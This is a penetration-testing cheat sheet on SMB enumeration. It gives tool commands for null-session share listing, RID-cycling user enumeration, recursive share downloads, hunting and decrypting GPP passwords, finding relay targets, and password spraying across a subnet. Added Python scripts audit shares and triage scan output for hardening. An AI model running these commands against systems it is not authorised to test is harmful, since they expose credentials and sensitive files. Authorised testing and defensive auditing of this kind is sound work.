# SMB Enumeration

SMB (Server Message Block) on ports 139/445 is a goldmine for internal enumeration. Extract share permissions, user lists, password policies, and sensitive files.

> **Information**
>
> SMB enumeration often works with null sessions (no credentials) on older systems, but authenticated enumeration yields significantly more information.

## Share Enumeration

### Null Session Enumeration

```bash
# smbclient - list shares (null session)
smbclient -L //TARGET -N

# smbmap - null session
smbmap -H TARGET

# CrackMapExec - null session
crackmapexec smb TARGET -u '' -p '' --shares

# enum4linux-ng - comprehensive null session
enum4linux-ng -A TARGET
```

### Authenticated Enumeration

```bash
# smbclient with credentials
smbclient -L //TARGET -U 'domain/user%password'

# smbmap authenticated
smbmap -H TARGET -u user -p password
smbmap -H TARGET -u user -p password -d domain

# CrackMapExec authenticated
crackmapexec smb TARGET -u user -p password --shares

# enum4linux-ng authenticated
enum4linux-ng -u user -p password -A TARGET
```

### Connecting to Shares

```bash
# Interactive connection
smbclient //TARGET/share -U 'user%password'

# Useful smbclient commands
smb: \> dir
smb: \> cd directory
smb: \> get filename
smb: \> mget *            # download every file in the current directory (asks per file)
smb: \> recurse ON        # descend into subdirectories
smb: \> prompt OFF        # no per-file confirmation
smb: \> mget *            # recursive, non-interactive download

# Mount share locally
sudo mount -t cifs //TARGET/share /mnt/share -o user=user,password=pass
sudo mount -t cifs //TARGET/share /mnt/share -o user=user,password=pass,domain=DOMAIN
```

## Deep Share Enumeration

### smbmap Deep Dive

```bash
# Recursive listing of one share, limited depth
smbmap -H TARGET -u user -p pass -r share --depth 5

# Download files whose names match a regex
smbmap -H TARGET -u user -p pass -R -A '\.(config|xml|txt|ini|bak)$'

# Search for specific filename patterns
smbmap -H TARGET -u user -p pass -R -A 'password|credential|secret'

# List all readable files recursively
smbmap -H TARGET -u user -p pass -R
```

### CrackMapExec Spider

```bash
# Spider shares for files
crackmapexec smb TARGET -u user -p pass -M spider_plus

# Spider while excluding noisy directories
crackmapexec smb TARGET -u user -p pass -M spider_plus -o EXCLUDE_DIR=Windows,ProgramData

# Output to JSON for analysis
crackmapexec smb TARGET -u user -p pass -M spider_plus -o OUTPUT=/tmp/spider.json
```

## User & Group Enumeration

### enum4linux-ng

```bash
# Full enumeration
enum4linux-ng -A TARGET

# Users only
enum4linux-ng -U TARGET

# Groups only
enum4linux-ng -G TARGET

# Shares only
enum4linux-ng -S TARGET

# Password policy
enum4linux-ng -P TARGET

# RID cycling (enumerate users via RID brute force)
enum4linux-ng -R TARGET
```

### rpcclient

```bash
# Connect with credentials
rpcclient -U 'user%password' TARGET

# Null session
rpcclient -U '' -N TARGET

# Interactive commands
rpcclient $> enumdomusers
rpcclient $> enumdomgroups
rpcclient $> queryuser 500
rpcclient $> queryuser administrator
# querygroupmem takes the group RID, not the name (512 = Domain Admins)
rpcclient $> querygroupmem 512
rpcclient $> getdompwinfo
rpcclient $> lsaenumsid
rpcclient $> lookupnames administrator
```

### Impacket Tools

```bash
# samrdump - dump SAM info
samrdump.py domain/user:password@TARGET

# lookupsid - enumerate users and groups by cycling RIDs
lookupsid.py domain/user:password@TARGET

# Raise the maximum RID to cycle (default is lower)
lookupsid.py domain/user:password@TARGET 20000
```

## Sensitive File Hunting

### High-Value Targets

```text
# Files to look for:
web.config          # ASP.NET config with connection strings
*.config            # Various app configs
unattend.xml        # Windows deployment answers
sysprep.xml         # Sysprep answers (may contain creds)
Groups.xml          # GPP passwords (SYSVOL)
*.kdbx              # KeePass databases
*.key, *.pem        # SSH/SSL keys
id_rsa              # SSH private keys
.git/               # Git repositories
.svn/               # SVN repositories
*.bak, *.old        # Backup files
passwords.txt       # Self-explanatory
credentials.xml     # Jenkins credentials
*.sql               # Database dumps
*.mdb, *.accdb      # Access databases
```

### GPP Password Extraction

```bash
# Check SYSVOL for Groups.xml (GPP passwords)
smbclient //DC/SYSVOL -U 'user%pass' -c 'recurse;ls' | grep -i groups.xml

# Download Groups.xml files from SYSVOL
smbmap -H DC -u user -p pass -R SYSVOL -A Groups.xml

# Decrypt the cpassword value from the XML
gpp-decrypt "encrypted_password_here"

# Automated with CrackMapExec
crackmapexec smb DC -u user -p pass -M gpp_password
```
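To check a mounted share or a SYSVOL copy for the file types in the list above, and for Group Policy Preferences XML files that still carry a `cpassword` attribute, here is an added Python example; it is not code from this page, from gpp-decrypt or from smbmap. It builds a constructed sample directory tree with `tempfile`, walks it, classifies filenames against the high-value patterns from the list, and reports `cpassword` attributes in the GPP XML files without decrypting them. The filenames, the `{GUID}` policy folder and the `cpassword` value in the sample are placeholders.

```python
import os
import re
import tempfile
import xml.etree.ElementTree as ET

# Filename patterns from the High-Value Targets list, matched case-insensitively
# against the full name (first match wins).
HIGH_VALUE_PATTERNS = [
    ("app-config", r".*\.config"),
    ("deployment-answers", r"(unattend|sysprep)\.xml"),
    ("keepass", r".*\.kdbx"),
    ("private-key", r"id_rsa|.*\.(key|pem)"),
    ("vcs-metadata", r"\.git|\.svn"),
    ("backup", r".*\.(bak|old)"),
    ("credentials", r"passwords\.txt|credentials\.xml"),
    ("database", r".*\.(sql|mdb|accdb)"),
]

# GPP preference files that can carry a cpassword attribute (Groups.xml is the classic one).
GPP_FILES = {"groups.xml", "services.xml", "scheduledtasks.xml",
             "datasources.xml", "drives.xml", "printers.xml"}
# Attribute names the different GPP file types use for the account the password belongs to.
ACCOUNT_ATTRS = ("userName", "accountName", "runAs", "username")


def classify_name(name):
    """Return the high-value category for a file or directory name, or None."""
    for category, pattern in HIGH_VALUE_PATTERNS:
        if re.fullmatch(pattern, name, re.IGNORECASE):
            return category
    return None


def gpp_cpassword_entries(xml_path):
    """List (tag, account, cpassword) for every non-empty cpassword attribute; nothing is decrypted."""
    try:
        tree = ET.parse(xml_path)
    except ET.ParseError:
        return []
    entries = []
    for elem in tree.iter():
        cpassword = elem.get("cpassword")
        if cpassword:  # attribute present and non-empty
            account = next((elem.get(a) for a in ACCOUNT_ATTRS if elem.get(a)), "?")
            entries.append((elem.tag, account, cpassword))
    return entries


def audit_tree(root):
    """Walk a directory tree (e.g. a mounted share) and collect findings as dicts."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for d in dirnames:
            category = classify_name(d)
            if category:
                findings.append({"path": os.path.join(dirpath, d), "category": category, "detail": ""})
        for f in filenames:
            full = os.path.join(dirpath, f)
            category = classify_name(f)
            if category:
                findings.append({"path": full, "category": category, "detail": ""})
            if f.lower() in GPP_FILES:
                for tag, account, cpw in gpp_cpassword_entries(full):
                    findings.append({"path": full, "category": "gpp-cpassword",
                                     "detail": f"{tag} element for account {account!r}, cpassword present ({len(cpw)} chars)"})
    return sorted(findings, key=lambda x: (x["path"], x["category"]))


# Constructed Groups.xml (placeholder account and cpassword value, not a real ciphertext).
SAMPLE_GROUPS_XML = """<Groups>
  <User name="LocalHelpdesk">
    <Properties action="U" userName="LocalHelpdesk" cpassword="PLACEHOLDER-NOT-A-REAL-CPASSWORD"/>
  </User>
</Groups>
"""


def build_sample_tree():
    """Create a small constructed share layout under a temp directory and return its root."""
    root = tempfile.mkdtemp(prefix="share_audit_")
    layout = {
        "IT/web.config": "<configuration/>",
        "IT/notes.txt": "nothing sensitive here",
        "Backups/hr_db.sql": "-- constructed dump",
        "Backups/old_site.bak": "",
        "Policies/{GUID}/Machine/Preferences/Groups/Groups.xml": SAMPLE_GROUPS_XML,
        # Empty cpassword: attribute present but no value, so it must not be reported.
        "Policies/{GUID}/Machine/Preferences/Services/Services.xml":
            "<NTServices><NTService name='svc'><Properties accountName='svc_backup' cpassword=''/></NTService></NTServices>",
        "dev/.git/HEAD": "ref: refs/heads/main",
    }
    for rel, content in layout.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    for finding in audit_tree(build_sample_tree()):
        print(f"{finding['category']:20} {finding['path']} {finding['detail']}")
```

Run it against a real mount point by calling `audit_tree("/mnt/share")`; the `cpassword` finding is reported by presence only, which is enough to know the policy needs to be removed from SYSVOL.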

## SMB Vulnerabilities

### SMB Signing Check

```bash
# List hosts where SMB signing is not required (the precondition for relay attacks)
crackmapexec smb TARGET --gen-relay-list relay.txt

# Nmap script
nmap -p 445 --script smb-security-mode TARGET

# Output shows one of:
# message_signing: disabled  (vulnerable to relay)
# message_signing: supported (enabled but not required, still relayable)
# message_signing: required  (not vulnerable)
```

### EternalBlue (MS17-010)

```bash
# Check for MS17-010
nmap -p 445 --script smb-vuln-ms17-010 TARGET

# CrackMapExec check
crackmapexec smb TARGET -u '' -p '' -M ms17-010
```
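The two nmap scripts above are easier to triage across many hosts from XML output (`-oX`) than from the text banner. The following Python is an added example, not part of the original cheat sheet or of nmap itself: it parses a constructed nmap XML excerpt (hosts and addresses are made up), reads `message_signing` from `smb-security-mode` and the `state` from `smb-vuln-ms17-010`, and turns them into a hardening list. The layout it assumes (host scripts under `<hostscript>` with `<elem key=...>` children, and a CVE-keyed `<table>` for the vulnerability script) follows nmap's structured script output; the sample is built to that shape.

```python
import xml.etree.ElementTree as ET

# Constructed nmap -oX excerpt (not from a real scan): three made-up hosts.
SAMPLE_NMAP_XML = """<nmaprun scanner="nmap">
  <host>
    <address addr="10.10.10.5" addrtype="ipv4"/>
    <hostscript>
      <script id="smb-security-mode" output="message_signing: disabled (dangerous, but default)">
        <elem key="account_used">guest</elem>
        <elem key="authentication_level">user</elem>
        <elem key="challenge_response">supported</elem>
        <elem key="message_signing">disabled</elem>
      </script>
      <script id="smb-vuln-ms17-010" output="VULNERABLE">
        <table key="CVE-2017-0143">
          <elem key="title">Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)</elem>
          <elem key="state">VULNERABLE</elem>
        </table>
      </script>
    </hostscript>
  </host>
  <host>
    <address addr="10.10.10.6" addrtype="ipv4"/>
    <hostscript>
      <script id="smb-security-mode" output="message_signing: supported">
        <elem key="message_signing">supported</elem>
      </script>
    </hostscript>
  </host>
  <host>
    <address addr="10.10.10.7" addrtype="ipv4"/>
    <hostscript>
      <script id="smb-security-mode" output="message_signing: required">
        <elem key="message_signing">required</elem>
      </script>
    </hostscript>
  </host>
</nmaprun>
"""


def parse_smb_findings(xml_text):
    """Map each host address to its signing mode and MS17-010 state (None when not reported)."""
    results = {}
    for host in ET.fromstring(xml_text).iter("host"):
        addr_elem = host.find("address")
        addr = addr_elem.get("addr") if addr_elem is not None else "unknown"
        entry = {"signing": None, "ms17_010": None}
        # iter() finds scripts whether nmap placed them under <hostscript> or <port>.
        for script in host.iter("script"):
            script_id = script.get("id")
            for elem in script.iter("elem"):
                value = (elem.text or "").strip()
                if script_id == "smb-security-mode" and elem.get("key") == "message_signing" and value:
                    # "disabled (dangerous, but default)" -> "disabled"
                    entry["signing"] = value.split()[0].lower()
                elif script_id == "smb-vuln-ms17-010" and elem.get("key") == "state":
                    entry["ms17_010"] = value.upper()
        results[addr] = entry
    return results


def triage(results):
    """Return (addr, issue, remediation) tuples for hosts that need hardening."""
    actions = []
    for addr, r in sorted(results.items()):
        # "supported" means signing is negotiable but not enforced, so relay still works.
        if r["signing"] in ("disabled", "supported"):
            actions.append((addr, "signing-not-required",
                            "enforce SMB signing via 'Microsoft network server: Digitally sign communications (always)'"))
        state = r["ms17_010"] or ""
        if "VULNERABLE" in state and not state.startswith("NOT"):
            actions.append((addr, "ms17-010", "apply the MS17-010 update and disable SMBv1"))
    return actions


if __name__ == "__main__":
    for addr, issue, fix in triage(parse_smb_findings(SAMPLE_NMAP_XML)):
        print(f"{addr:15} {issue:22} {fix}")
```

Feed it a real file with `parse_smb_findings(open("scan.xml").read())` after running nmap with `-oX scan.xml` and both scripts.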

### PrintNightmare Check

```bash
# Check if the Print Spooler is exposed over RPC (MS-RPRN = Print System Remote Protocol)
rpcdump.py TARGET | grep -i 'MS-RPRN'

# CrackMapExec module
crackmapexec smb TARGET -u user -p pass -M printnightmare
```

## Mass SMB Enumeration

```bash
# Enumerate entire subnet
crackmapexec smb 10.10.10.0/24 -u user -p pass --shares

# Find writable shares
crackmapexec smb 10.10.10.0/24 -u user -p pass --shares | grep -i write

# Password spray across SMB
crackmapexec smb targets.txt -u users.txt -p 'Password123!' --continue-on-success

# Export results
crackmapexec smb 10.10.10.0/24 -u user -p pass --shares --export shares.json
```
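Instead of `grep -i write` over the console output, a subnet-wide `--shares` run can be parsed into a per-host inventory. This is an added Python example, not CrackMapExec's own code: it parses a constructed sample in the shape of CME's `--shares` console output (hosts, names and shares are made up, and the column layout is assumed from the tool's text output), and returns the writable shares plus the hosts where signing is off or SMBv1 is on, which is the list to hand to whoever owns those systems.

```python
import re

# Constructed sample in the shape of CrackMapExec --shares output (not a real capture).
SAMPLE_CME_OUTPUT = """\
SMB         10.10.10.5      445    DC01             [*] Windows Server 2019 Build 17763 x64 (name:DC01) (domain:corp.local) (signing:True) (SMBv1:False)
SMB         10.10.10.9      445    FS01             [*] Windows 10.0 Build 19041 x64 (name:FS01) (domain:corp.local) (signing:False) (SMBv1:True)
SMB         10.10.10.5      445    DC01             [+] corp.local\\jdoe:REDACTED
SMB         10.10.10.9      445    FS01             [+] corp.local\\jdoe:REDACTED
SMB         10.10.10.5      445    DC01             [+] Enumerated shares
SMB         10.10.10.5      445    DC01             Share           Permissions     Remark
SMB         10.10.10.5      445    DC01             -----           -----------     ------
SMB         10.10.10.5      445    DC01             ADMIN$                          Remote Admin
SMB         10.10.10.5      445    DC01             C$                              Default share
SMB         10.10.10.5      445    DC01             IPC$            READ            Remote IPC
SMB         10.10.10.5      445    DC01             NETLOGON        READ            Logon server share
SMB         10.10.10.5      445    DC01             SYSVOL          READ            Logon server share
SMB         10.10.10.9      445    FS01             [+] Enumerated shares
SMB         10.10.10.9      445    FS01             Share           Permissions     Remark
SMB         10.10.10.9      445    FS01             -----           -----------     ------
SMB         10.10.10.9      445    FS01             Public          READ,WRITE      Company drop folder
SMB         10.10.10.9      445    FS01             Finance         READ            Finance dept
SMB         10.10.10.9      445    FS01             Software        READ,WRITE      Installers
"""

# Every line: protocol, IP, port, hostname, then the payload.
LINE_RE = re.compile(r"^SMB\s+(?P<ip>\S+)\s+(?P<port>\d+)\s+(?P<name>\S+)\s+(?P<rest>.*)$")
# Banner line carries the signing and SMBv1 flags.
BANNER_RE = re.compile(r"\(signing:(?P<signing>True|False)\)\s+\(SMBv1:(?P<smbv1>True|False)\)")
# Share row: name, optional permission column, optional remark (columns separated by 2+ spaces).
SHARE_RE = re.compile(r"^(?P<share>\S+)\s{2,}(?:(?P<perms>READ,WRITE|READ|WRITE)\s*)?(?P<remark>.*)$")


def parse_cme_shares(text):
    """Return {ip: {"name", "signing", "smbv1", "shares": {share: perms}}} from --shares output."""
    hosts = {}
    for line in text.splitlines():
        m = LINE_RE.match(line.rstrip())
        if not m:
            continue
        ip, name, rest = m.group("ip", "name", "rest")
        host = hosts.setdefault(ip, {"name": name, "signing": None, "smbv1": None, "shares": {}})
        if rest.startswith("[*]"):
            b = BANNER_RE.search(rest)
            if b:
                host["signing"] = b.group("signing") == "True"
                host["smbv1"] = b.group("smbv1") == "True"
            continue
        # Status lines and the table header/divider are not shares.
        if rest.startswith("[") or rest.split()[0] in ("Share", "-----"):
            continue
        s = SHARE_RE.match(rest)
        if s:
            host["shares"][s.group("share")] = s.group("perms") or ""  # "" = no access
    return hosts


def writable_shares(hosts):
    """(ip, share) pairs with WRITE access, sorted; the structured form of `grep -i write`."""
    return sorted((ip, share) for ip, h in hosts.items()
                  for share, perms in h["shares"].items() if "WRITE" in perms)


def hosts_needing_hardening(hosts):
    """Hosts with signing not enforced or SMBv1 still enabled."""
    return sorted(ip for ip, h in hosts.items() if h["signing"] is False or h["smbv1"])


if __name__ == "__main__":
    inventory = parse_cme_shares(SAMPLE_CME_OUTPUT)
    print("writable:", writable_shares(inventory))
    print("harden:", hosts_needing_hardening(inventory))
```

Pipe the real run through `tee shares.log` and call `parse_cme_shares(open("shares.log").read())`; a share whose name is literally `Share` would be skipped by the header check, which is the one ambiguity in parsing the text table.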

## Quick Reference

| Task | Tool | Command |
|------|------|---------|
| List shares | smbmap | `smbmap -H TARGET -u user -p pass` |
| Full enum | enum4linux-ng | `enum4linux-ng -A TARGET` |
| Spider files | CME | `cme smb TARGET -M spider_plus` |
| GPP passwords | CME | `cme smb DC -M gpp_password` |
| Signing check | CME | `cme smb TARGET --gen-relay-list` |